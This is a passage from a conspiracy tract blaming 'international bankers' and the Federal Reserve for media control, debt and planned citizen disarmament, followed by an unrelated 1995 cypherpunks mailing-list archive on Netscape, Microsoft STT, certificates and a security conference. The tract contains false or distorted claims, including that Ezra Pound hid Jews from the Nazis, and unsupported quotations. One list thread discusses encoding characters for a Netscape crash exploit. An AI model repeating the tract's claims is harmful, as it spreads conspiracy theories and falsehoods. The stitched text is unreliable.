bankers and debts for the people.

   So-called "economic experts" write syndicated columns in hundreds of
newspapers, craftily designed to prevent the people from learning the
simple truth about our debt-currency system. Commentators on radio and
TV, educators, and politicians blame the people as wasteful, lazy, or
spendthrift, and blame the workers and consumers for the increase in
debts and the inflation of prices, when they really know that the basic
cause is the debt-currency system itself. Our people are drowned in char-
ges and counter-charges designed to confuse them and keep them from under-
standing the evil currency system that so silently robs the workers, farm-
ers, and business people of the fruit of their labor. And, increasingly,
the system is being used to rob us of our rights and freedoms, supposedly
guaranteed by the U.S. Constitution.

   In his book INVENTING REALITY,  Michael Parenti wrote:
   "Ten business and financial corporations control the three major tele-
vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat-
ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59
magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON
POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub-
lishers and various motion picture companies like Columbia Pictures and
Twentieth Century Fox. Three quarters of the major stockholders of ABC,
CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust,
Citibank, and Bank of America.
   The overall pattern is one of increasing concentration of ownership
and earnings. According to a 1982 LOS ANGLEES TIMES survey, independent
daily newspapers are being gobbled up by the chains at the rate of fifty
or sixty a year. Ten newspaper chains earn over half of all newspaper rev-
enue in this country. Five media conglomerates share 95 percent of the
record and tapes market with Warner and CBS alone controlling 65 percent
of the market. Eight Hollywood studios account for 89 percent of U.S.
feature film rentals. Three television networks earn over two-thirds of
total U.S. television revenues. Seven paperback publishers dominate the
mass market for books...
   While having an abundance of numbers and giving an appearance of di-
versity, the mass media actually are highly centralized outlets that
proffer a remarkably homogenized fare. New services for dailies through-
out the entire nation are provided by the Associated Press and United
Press International (which may soon merge with AP or go under), The New
York Times-Washington Post wire services, and several foreign wire ser-
vices like Reuters. The ideological viewpoint of these news conduits are
pretty much the same, marked by prefabricated standardization of news
which is constricting and frightening."

   In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:
"The power to control information is a major lever in the control of
society. Giving citizens a choice in ideas and information is as impor-
tant as giving them a choice in politics. If a nation has narrowly con-
trolled information it will soon have narrowly controlled politics."

   When a few informed and concerned people or organizations who know the
truth begin to expose the bankers and their agents, or try to stop any of
their mad schemes, the messengers are ridiculed and smeared as "right-
wing extremists," "super-patriots," "bigots," "racists," "facists," or
"antisemites." Any name is used to discredit them, and to stop other peo-
ple from listening. Books and articles such as you are now reading are
kept out of schools, libraries, and book stores.

   Some, who are especially vocal in their exposure of the treason com-
mitted against our people, are harassed by government agencies such as
the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank-
ruptcy. Sometimes their businesses and homes are violently raided at gun-
point, and their money, currency, equipment, and records confiscated, so
it is very difficult, if at all possible to continue their business. In
Chapter One the National Commodity and Barter Association was mentioned as
an example of such raids. But the most striking case has been that of Ezra
Pound, which is covered below.

   Using these methods, the Federal Reserve bankers and their agents have
been completely successful in preventing most Americans from learning the
things you are reading in this report. However, in spite of their control
of information, they realize that more and more citizens are learning the
truth. Therefore, to prevent retaliation and armed resistance to their
plunder of America, they plan to register all firearms and eventually
disarm all citizens. They want to eliminate all guns not in the hands of
their government police or army. Our wise Founding Fathers wrote the Se-
cond Amendment to the Constitution so that the people could protect them-
selves against the government.

   Love of life, interest in your freedom, compassion for humanity, con-
cern for your children, and the safety of all you have worked for should
make you deeply interested in this, America's greatest problem. Our gener-
ation has not suffered under the bankers' yoke as the coming generations
will. Usury and taxes will continue to take a larger and larger part of
the earnings of the people and put them deeper into the pockets of the
bankers and their agents. Increasing "government" regulations will prevent citizen
protest and opposition to their control. Is it possible that your grand-
children will own neither car nor home, but will live in "government-
owned" apratments and ride to work in "government-owned" buses, and be
allowed to keep just enough of their earnings to buy a minimum of food and
clothing, while their rulers wallow in luxury? In Asia and Eastern Europe
this used to be called communism. In America it is called democracy or
capitalism.

   Horace Greeley stated, "While boasting of our noble deeds, we are
careful to conceal the ugly fact that by an iniquitious currency system
we have nationalized a system of oppression which, though more refined, is
no less cruel than the old system of chattel slavery."

                     THE CASE OF EZRA POUND

   Ezra Pound was a poet, one of America's greatest - if not the great-
est. He played a major role in the development of writers and poets, such
as E.E. Cummings, T.S. Elliot, Robert Frost, Ernest Hemingway, James Joyce,
and William Carlos Williams. He also studied politics, economics, banking,
and monetary theory. He disapproved of war. During World War II, he hid a
number of Jews from the Nazi exterminators; if discovered the penalty
would have been death. He broadcast a series of talks on Italian radio
aimed at Americans. He had wanted America to stay out of the war, and he
said some uncomplimentary things about President Franklin D. Roosevelt. He
also stated some of his political and monetary ideas. He was accused of
being a traitor. At the end of the war he was imprisoned in an American
concentration camp near Pisa, Italy for six months without trial. Then he
was transferred to America where he was declared insane and imprisoned in
a mental hospital in Washington D.C. for thirteen years. After which the
treason charges, for which he had never stood trial, were dropped, and he
was released. He returned to Italy, where he lived until his death in
1972.

   The reason he was not tried seems to be that his prosecutors didn't
have a case that would hold up in court and/or they were afraid that he
would repeat in court what he had said over the radio in Italy. Wendell
Muncie, M.D., one of the psychiatrists involved in his "sanity hearing,"
said that Pound's insanity consisted of three factors: his passion for the
U.S. Constitution, his espousal of the Confucian ethic, and his desire for
world peace. No formal diagnosis of Pound's supposed "insanity" has been
found. His captors in Washington openly admitted that Pound was a polit-
ical prisoner. A Congressional investigation started in 1957 and completed
in 1958 exposed the inadequacy of the case against Pound and led to his
release.
   Here are some extracts from Pound's radio talks:
. "I think an alliance with Stalin's Russia is rotten." (January 29,1942)
."Liberty is not a right but a duty." (March 8, 1942)
."Sovereignty inheres in the right to issue money. And the American sov-
ereignty belongs by right to the people, and their representatives in
Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on
the obeservation of this quite decided law.... Now the point at which em-
bezzlement of the nation's funds on the part of her officers becomes trea-
son can probably be decided only by jurists, and not by hand-picked judges
who support illegality." (April 9, 1942)
.Quotes read by Pound: 1. "'I believe that banking institutions are more
dangerous to our liberties than standing armies.' - Thomas Jefferson.
2. 'I have two great enemies, the southern army in front of me and the
financial institutions in the rear. Of the two, the one in the rear is the
greatest enemy.' - Abraham Lincoln.
3. 'The money power preys upon the nation in times of peace and conspires
against it in times of adversity. It is more despotic than monarchy, more
insolent than autocracy, more selfish than bureaucracy; it denounces as
public enemies all who question its methods, or throw light upon its
crimes.' - William Jennings Bryan." (July 26, 1942)
.Back to Pound's own words: "Wars in old times were made to get slaves.
The modern implement of imposing slavery is debt." (March 25, 1943)
."The phase of the usury system which we are trying to analyze is more or
less Patterson''s perception that the Bank of England could have benefit
of all the interest on all the money that it creates out of nothing....
Now the American citizen can, of course, appeal to his constitution, which
states that Congress shall have power to coin money or regulate the value
thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30,
1943)
."That text is known to them that have the patience to read it, possibly
one-hundredth of one percent of the denizens. They forget it, all save
a few Western states. I think somebody in Dakota once read it. The Consti-
tution." June 30, 1943)

       THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONALAND ILLEGAL

   Although there has never been a court case that challenged the legal-
ity of the Federal Reserve System, there was a challenge to the National
Recovery Act or NRA, which has ruled unconstitutional. The U.S. Supreme
Court - Schechter Poultry v. U.S.,29 U.S.495, 55 U.S. 837.842 (1935) -
ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI-
MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states,
"The Congress shall have power... to coin money, regulate the value there-
of..." By passing the Federal Reserve Act, Congress abdicated and trans-
ferred to the Federal Reserve bankers its constitutionally legitimate
function of issuing and controlling money. If the Supreme Court ruling on
the NRA is applied to the Federal Reserve System, the unconstitutionality
and illegality of the Fed becomes obvious.

                        TELL THE PEOPLE

   America will not shake off her illegal banker-controlled dictatorship
as long as the people are ignorant of the hidden controllers. Interna-
tional bankers, who control most of the governments of the nations and
most sources of information, seem to have us completely in their grasp.
They are afraid of only one thing: an awakened citizenry armed with the
truth. An ignorant citizen is the banker-government's best "client." An
informed citizen is the banker-government's worst nightmare.

   Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At-
lanta Georgia, said:
   "This is a staggering thought. We are completely dependent on the com-
mercial banks. Someone has to borrow every dollar we have in circulation,
cash, or credit. If the banks create ample synthetic money, we are pros-
perous; if not, we starve. We are absolutely without a permanent money
system. When one gets a complete grasp of the picture, the tragic absur-
dity of our hopeless position is almost incredible, but there it is. It
is the most important subject intelligent persons can investigate and re-
flect upon. It is so important that our present civilization may collapse
unless it becomes widely understood and the defect remedied very soon."

                        PRIVATE BANKING

   In California a very private "non-bank" has been operating successfully
for fifteen years. It caters for accounts in gold or Federal Reserve
Notes. It is completely private and doesn't report to anyone. It pays in-
terest on both gold and Federal Reserve Note balances. Ideally, we need to
establish a network of private banks throughout the country, and even-
tually throughout the rest of the world. See Chapter Twelve.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Sep 95 05:08:27 PDT
To: cypherpunks@toad.com
Subject: STT_???
Message-ID: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-28-95. W$Japer:


   "Infighting Unravels Alliance Seeking Standard to Protect
   Internet Purchases."

      The consortium brought together such top players as
      credit-card rivals Visa International and MasterCard
      International Inc., software titan Microsoft Corp. and
      Internet upstart Netscape Communications Corp. But this
      week, the alliance split because of tensions between
      Visa and MasterCard and their respective technology
      partners -- Microsoft and Netscape.

      Regarding Netscape, Mr. Dent of Microsoft said the
      firm's security deficiencies that have recently come to
      light have "tainted" electronic commerce on the
      Internet. Mr. Dent also noted that Microsoft yesterday
      introduced new security technology, including means to
      verify a user's identity, that is much stronger than
      Netscape's.


   STT_???  (6 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 28 Sep 95 05:33:31 PDT
To: hallam@w3.org
Subject: Re: Hack Microsoft NT C2 Rating?
In-Reply-To: <9509272102.AA21900@zorch.w3.org>
Message-ID: <9509281232.AA02546@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:

> I think that c2 is possibly the limit of orange/red bookishness that is 
> reasonable to work to. It is not a trivial level of security however, UNIX 
> despite all the claims has never been shipped as C2 secure as standard by a 
> mainstream vendor. Even requirements involving trivial effort but which are 
> extreemly important such as the writing of a users security guide have never 
> been taken seriously on any of the UNIX platforms on which I have worked.

A slight correction: SCO shipped the C2 version of their Open
Desktop 1.1 as the standard (in fact, only) version a few years
back.  The howls of outrage from their customer base (due to the
non-standard-Unix behavior) caused them to back off in the next
major release.  Last time I tried to install their software, C2
had been made an option.  (Of course, AFAIK, they never actually
completed a C2 evaluation.)


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 28 Sep 95 08:33:05 PDT
To: Travis Corcoran <cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509281532.IAA25269@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 PM 9/27/95 -0400, Travis Corcoran wrote:
>A question: in a situation like this one, where an individual signed a
>message with a key then did not make a key with the return address of
>his message available either through his .plan, or a keysever (the two
>de facto standards), what next step -if any- do people think is more
>appropriate than sending mail to the individual asking them for a copy
>of the key ?

Keep up the good work.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 28 Sep 95 06:09:58 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
Message-ID: <199509281309.JAA12017@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


This came across the SSL mailing list.  Anyone know Taher's position
on key-escrow?


| From ssl-talk-request@netscape.com  Thu Sep 28 01:54:10 1995
| Resent-Date: Tue, 26 Sep 1995 09:34:09 -0700
| Date: Tue, 26 Sep 1995 09:30:03 -0700
| Message-Id: <199509261630.JAA06021@neon.netscape.com>
| X-Sender: elgamal@pop.mcom.com
| X-Mailer: Windows Eudora Version 2.0.3
| Mime-Version: 1.0
| Content-Type: text/plain; charset="us-ascii"
| To: John Droge <jdroge@ix.netcom.com>, ssl-talk@netscape.com
| From: elgamal@netscape.com (Taher ElGamal)
| Subject: Re: Crypto
| Resent-Message-ID: <"BFRph1.0.yW1.jg2Qm"@neon>
| Resent-From: ssl-talk@netscape.com
| X-Mailing-List: <ssl-talk@netscape.com> archive/latest/987
| X-Loop: ssl-talk@netscape.com
| Precedence: list
| Resent-Sender: ssl-talk-request@netscape.com
| 
| Can I get some detailed info about your company and products-- We are
| thinking about this.
| 
| taher
| 
| At 11:34 PM 9/25/95 -0700, John Droge wrote:
| >Dear Sirs:
| >
| >My company developed and currently produces the Fortezza Crypto 
| >Card for the Government.  What plans to you have to support this 
| >standard?
| >
| >Sincerely,
| >John Droge
| >Vice President
| >Program Development
| >Mykotronx, Inc.
| >357 Van Ness Way, Ste. 200
| >Torrance, CA  90501
| >(310) 533-8100
| >
| >
| >
| >
| >
| >
| Taher Elgamal                   elgamal@netscape.com
| Chief Scientist
| Netscape Comm Corp., 501 E Middlefield Road, Mountain View Ca 94043.
| (415) 528 2898 (Tel),          (415) 528 4122 (Fax)
|           
| 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Thu, 28 Sep 95 09:18:28 PDT
To: cypherpunks@toad.com
Subject: Simple Hardware RNG Idea
Message-ID: <199509281615.JAA27355@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello all.

Someone mentioned this on IRC last night, and it sounded like a really
cool idea, so I thought I'd mention it.

The idea is to generate random numbers using a geiger counter tube and
a small portion of radioactive substance (like perhaps the stuff they
use in smoke detectors?) Would that be random enough?

I thought it was a neat idea anyway.

Christopher
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Sep 95 06:15:39 PDT
To: cypherpunks@toad.com
Subject: 25 Crays a Year to Break STT
Message-ID: <199509281315.JAA11395@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, September 28, 1995, p.1.


   Rivalry for Internet Security Grows

   By Louise Kehoe in San Francisco


   The Internet rivalry between Microsoft, the world's largest
   software company, and Netscape Communications increased
   yesterday when they announced competing encryption
   technology intended to ensure the security of financial
   transactions over the global computer network.

   Mr James Clark chairman of Netscape, the leading supplier
   of browser software that enables personal computer users to
   "surf" the Internet, also revealed the company had turned
   down a move by Microsoft to take a minority stake in
   Netscape earlier this year, before Netscape's public
   offering.

   Microsoft's encryption technology, developed with Visa
   International the credit card processing organisation, is
   intended to solve Internet security problems which have
   become a serious barrier to electronic commerce.

   Recent incidents, including the hacking of supposedly
   secure Internet software developed by Netscape, have
   heightened concerns about sending sensitive data such as
   credit card numbers over the Internet.

   Microsoft said its Secure Transaction Technology (STT), was
   designed to provide a much higher level of security for
   credit card transactions on the Internet. Netscape's
   general purpose encryption system uses a 40 or 128-bit
   electronic "key", while STT will use 2,000-bit keys.

   "By Christmas of 1996 you will be able to shop on the
   Internet to your heart's content, without even thinking
   about security," said Mr Warren Dent, Microsoft director of
   business development for consumer systems.

   Although no encryption system was totally secure, Mr Dent
   estimated it would take "25 Cray supercomputers a year" to
   break the STT codes.

   Netscape, however, said a new version of its Navigator
   software, which will become available next week will
   provide the same level of security. Netscape's "Secure
   Courier" technology has been developed in conjunction with
   MasterCard, Visa's credit card rival.

   To encourage widespread adoption of STT, Microsoft and Visa
   are making its technical specifications available at no
   charge to third parties to allow them to develop software.
   Netscape said Microsoft is expecting to charge transaction
   fees each time the STT technology is used.

   Commercial software products incorporating STT are expected
   to be available by April, Microsoft said. Netscape says
   Secure Courier will be available sooner.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Wed, 27 Sep 95 16:18:40 PDT
To: cypherpunks@toad.com
Subject: re: chaos cryptography
Message-ID: <9509272318.AA20158@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Duh!

As someone pointed out to me in email I wrote "stenography" when
I meant "steganography" in the intro to the New Scientist article.
(Well I'm sure ou all knew what I meant)

Sherry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 09:26:05 PDT
To: dl@hplyot.obspm.fr (Laurent Demailly)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509281050.AA15525@hplyot.obspm.fr>
Message-ID: <199509281619.JAA24789@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> No, you *can* put 0x22, 0x3e and 0x2f by using respectively
> &#34; &#62; and &#47; html constructs  (&#nnn; nn decimal ascii code)
> unfortunatly &#0; is not recognized but you can probaly use any number
> substracted by itself or even short lda#0 (depending on the cpu),...if
> you need a zero,...(what for ?)

	Oh that's great.. netscape might -not- be doing the conversion
before it crashes though.. worth a shot to check though, without a
doubt.

> 
> I hope this helps too, btw, anywone having contacts on the 8lgm folks?
> they must have experience with that kind of stuff...

	Karl told me that it's their policy only to do exploits for
bugs they have found themselves.

> Even if a patch should be availble now, making a demonstration is
> still interesting IMO [specially when you know that there are still
> ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP
> access packages!...]

	Look at http://www.c2.org/ with an unpatched
netscape. Hopefully other sites will do similar things.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 09:26:20 PDT
To: jya@pipeline.com (John Young)
Subject: Re: STT_???
In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
Message-ID: <199509281621.JAA24930@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>       Regarding Netscape, Mr. Dent of Microsoft said the
>       firm's security deficiencies that have recently come to
>       light have "tainted" electronic commerce on the
>       Internet. Mr. Dent also noted that Microsoft yesterday
>       introduced new security technology, including means to
>       verify a user's identity, that is much stronger than
>       Netscape's.

	Yeah. Right. I propose we show the world how Microsoft will
respond to security problems. I should have a tentative web page up by
later tonight.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 09:48:01 PDT
To: cypherpunks@toad.com
Subject: awards for hacking microsoft
Message-ID: <199509281642.JAA26140@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've been working on putting together my hack microsoft
promotion and I need to think of a good low-budget award. T-shirts
would not be economically feasible -- I expect to be awarding many
microsoft awards.. Ideas would be appreciated. Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 10:39:49 PDT
To: cypherpunks@toad.com
Subject: Re: 25 Crays a Year to Break STT
Message-ID: <199509281737.KAA15655@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   Microsoft said its Secure Transaction Technology (STT), was
>   designed to provide a much higher level of security for
>   credit card transactions on the Internet. Netscape's
>   general purpose encryption system uses a 40 or 128-bit
>   electronic "key", while STT will use 2,000-bit keys.
Sigh.  Apples and oranges, and they know it.
....
>   Although no encryption system was totally secure, Mr Dent
>   estimated it would take "25 Cray supercomputers a year" to
>   break the STT codes.

So how much work can 25 Crays do in a year?  Crack single-DES?
Maybe RC4/64?  
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 10:37:25 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
Message-ID: <199509281737.KAA15679@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 9/25/95 -0700, sameer <sameer@c2.org> wrote:
>	The really big sticking point I see, however, is the
>certification authorities. There is a single point of failure here and
>that is at Verisign. This becomes a large problem I think if the en
>rypted email that Netscape does requires personal x509 certificates (I
>read that Versign is issuing those for $9/each.) This is a problem
>because for one thing I don't think Versign will want to issue certs
>to psudonyms, and Netscape may not talk encrypted email to
>non-certified people. (I am not sure)

Verisign has a range of certificate types; a "Type I", which only
promises that the userid is unique and is otherwise unverified,
is free for non-commercial users and something like $6 for commercial;
Types II and III require various levels of documentation and $$ to get.
The www.verisign.com home page didn't exactly say how to get one;
I gather the answer is "wait for October" or "Use the next Netscape
version", where I'm don't remember if that's 1.2.2 or 2.0.

Netscape is being modified to accept non-Verisign CAs, which means
we _can_ build a web of trust to take advantage of it, using
X.509 certs or a hybrid of X.509 and PGP.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 10:37:23 PDT
To: cypherpunks@toad.com
Subject: Re: Prvasoft FAX Encryption Software
Message-ID: <199509281737.KAA15710@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


After the recent discussions of the Privasoft Fax Software
and its proprietors' dislike of the Cryptographers' Inquisition :-),
I wrote the author a neutral note discussing what I'm trying
to accomplish for one of my customers, and asked about evaluation copies.
He's put it on the Web at www.megasoft.com/privasoft/ ;
it's "not crippleware", just limited number of uses.
So anybody who wants to do some research into proprietary patented
trade-secret products [_I_ didn't say Snake Oil in this posting :-)],
there it is.  His description of it sounds like it's got a
reasonably friendly GUI, though I'm not sure that rates $130
when you can get fax software free with modems or really
high-quality OCR-equipped fax software for less than that...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 28 Sep 95 10:39:53 PDT
To: cypherpunks@toad.com
Subject: FSTC - What is it...
Message-ID: <v0211010fac9088834ecd@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


In answer to your question:

I am not the official spokesperson for the organization. In fact I serve on
a working group in an advisory and design review capacity. However I can
tell you that:

The Financial Services Technology Consortium (FSTC) is a
consortium of financial services providers, national laboratories,
universities, and government agencies who sponsor and participate in
non-competitive collaborative research and development on interbank
technical projects.

The home page is located at

     http://www.llnl.gov/fstc

and although still under construction offers pointers to a number of our
projects like e-check and electronic-payment-handler as well as
fraud-prevention tools and technologies. As to the actual posting of the
wqebsite I just finished this yesterday so it will be listed pretty much in
all the "cool places".

a good point of contact for FSTC is: Dan.Schutzer@citicorp.com (Dan, please
forgive me for giving the world your name!)

I personally see FSTC as the strongest player in the secure e-commerce
effort and would advise any banking and other financial services players
(including the bond and stock houses) to get onto their bandwagon,
yesterday...

This leads me to believe that because of their Federal
Involvement/Sponsership, that they will indeed become *the* defacto
standards organization.

As to the meetings planned they are scheduled for the
-----------------------------------------------------
10-Oct-95       E-Payment Working Group - Security Services, Cambridge Mass.

11-Oct-95       W3C meeting , Cambridge Mass.

26-Oct-95       E-Payment Working Group , General Meeting, Teaneck, NJ.


Hope this answers your questions...

Sincereley,
Todd Glassey
E-Payment Working Group
Chief Technologist
Looking Glass Technologies
todd@lgt.com


>This reached me via a couple of lists, so I hope I'm replying to the
>right person:
>
>
>>FYI-  the FSTC E-payment Working Group meeting is happening at the W3 meeting
>>on the day before the meeting itself. The meeting is being held at the OSF
>>facilities.
>
>Did you send this note? Can you tell me a bit more about this --
>what's FSTC?
>
>Thanks!
>
>--Michael Smith
>  smithmi@dev.prodigy.com
>
>  Support the Zimmerman legal defense! http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 28 Sep 95 07:53:17 PDT
To: cypherpunks@toad.com
Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers
Message-ID: <v02120d00ac906737c792@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: zurko@osf.org (Mary Ellen Zurko)
Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers
To: www-buyinfo@allegra.att.com
Date: Thu, 28 Sep 95 9:59:45 EDT
Cc: zurko@osf.org (Mez)
Mailer: Elm [revision: 70.85]

                           CALL FOR PAPERS

1996 IEEE Symposium on                              May 6-8, 1996
Security and Privacy                            Oakland, California

                             sponsored by
  IEEE Computer Society Technical Committee on Security and Privacy
                         in cooperation with
    The International Association for Cryptologic Research (IACR)

Since 1980, the Symposium on Security and Privacy has been the premier
forum for presenting developments in computer security and for
bringing together researchers and practitioners in the field.

This year, we seek to build upon this tradition of excellence by
re-emphasizing work on engineering and applications as well as
theoretical advances.  We also seek to broaden the scope of the
Symposium by introducing additional topics.  We want to hear not only
about new theoretical results, but also about work in the design and
implementation of secure systems and work on policy relating to system
security.  We are particularly interested in papers on policy and
technical issues relating to privacy in the context of the Information
Infrastructure, papers on securing unsecure applications and operating
systems, papers that relate software and system engineering technology
to the design of secure systems, and papers on hardware and
architectural support for secure systems.

The symposium will focus on technical aspects of security and privacy
as they arise in commercial and industrial applications, as well in
government and military systems.  It will address advances in the
theory, design, implementation, analysis, and application of secure
computer systems, and in the integration and reconciliation of
security and privacy with other critical system properties such as
reliability, performance, and safety.  Topics in which papers and
panel session proposals are invited include, but are not limited to,
the following:


Secure systems          Privacy Issues          Access controls
Security verification   Network security        Policy modeling
Information flow        Authentication          Database security
Data integrity          Security Protocols      Viruses and worms
Auditing                Biometrics              Smartcards
Commercial and industrial security              Intrusion Detection
Security and other critical system properties   Distributed systems security
Novel applications of cryptography and other security techniques

We will continue the session of very brief (5-minute) talks introduced
last year.  Our goal is to make it possible for us to hear from people
who are advancing the field in the areas of system design and
implementation, and who would like to present their ideas to the
symposium audience but may lack the time and resources needed to
prepare a full paper.  Submissions for this session will be accepted
up to April 2, 1996 to permit us to hear of the most recent
developments. Abstracts of these talks will be distributed at the
conference.

INSTRUCTIONS TO AUTHORS:

Send six copies of your paper and/or proposal for a panel session to
John McHugh, Program Co-Chair, at the address given below.  Papers and
panel proposals must be received by November 6, 1995.  Papers, which
should include an abstract, must not exceed 7500 words.  The names and
affiliations of the authors should appear on a separate cover page
only, as a ``blind'' refereeing process is used.  In addition to the
paper submission, an ASCII copy of the paper title and abstract should
be sent to the Program Co-Chair (mchugh@cs.pdx.edu) by electronic mail.
These will be distributed electronically (without author
identification) to the entire program committee to aid in the
appropriate assignment of referees. Authors must certify prior to
December 25, 1995 that any and all necessary clearances for
publication have been obtained.

Papers must report original work that has not been published
previously, and is not under consideration for publication elsewhere.
Abstracts, overlength papers, electronic submissions, late
submissions, and papers that cannot be published in the proceedings
will be rejected without review.  Authors will be notified of
acceptance by January 16, 1996.  Camera-ready copies are due not later
than March 4, 1996.

Panel proposals should describe, in two pages or less, the objective
of the panel and the topic(s) to be addressed.  Names and addresses of
potential panelists (with position abstracts if possible) and of
the moderator should also be included.  Panels are not intended to
serve as alternate paper sessions and it is expected that, with the
possible exception of an overview of the topic area by the panel
chair, individual presentations by panel members will be limited to
five to ten minutes and that at least one third of the session will be
reserved for discussion.

Submitters of abstracts for the special session of five-minute talks
should submit one page abstracts to John McHugh, Program Co-Chair, at
the address given below.  The abstract should be one page or less;
Email submissions of 30 to 60 lines are preferred. Abstracts must be
received by April 2, 1996.  Authors will be notified of acceptance or
rejection of abstracts by April 16.  Submitted abstracts that are
accepted will be distributed at the conference.  Presenters of
five-minute talks are expected to register for the conference.
Overtly commercial presentations are inappropriate.

The Symposium will also include informal poster sessions where
preliminary or speculative material, and descriptions or
demonstrations of software, may be presented.  Send one copy of your
poster session paper to Dale Johnson, at the address given below, by
January 31, 1996, together with certification that any and all
necessary clearances for presentation have been obtained.

Again this year, we will attempt to counsel prospective authors.  If
you have questions about whether or how to present your work to the
symposium, please send email to the Chair (dmj@mitre.org), and we will
do our best to assist you.

Information about this conference will be also be available by
anonymous ftp from ftp.cs.pdx.edu in directory /pub/SP96, on the web
at http://www.cs.pdx.edu/SP96. The program chairs can be reached by
email at sp96@cs.pdx.edu.

PROGRAM COMMITTEE

Dave Bailey, Galaxy Computer Services, USA
Terry Vickers Benzel, TIS, USA
Lee A. Benzinger, Loral, USA
Debbie Cooper, DMCooper, USA
Oliver Costich, Independent Consultant, USA
Yves Deswarte, LAAS-CNRS & INRIA, FR
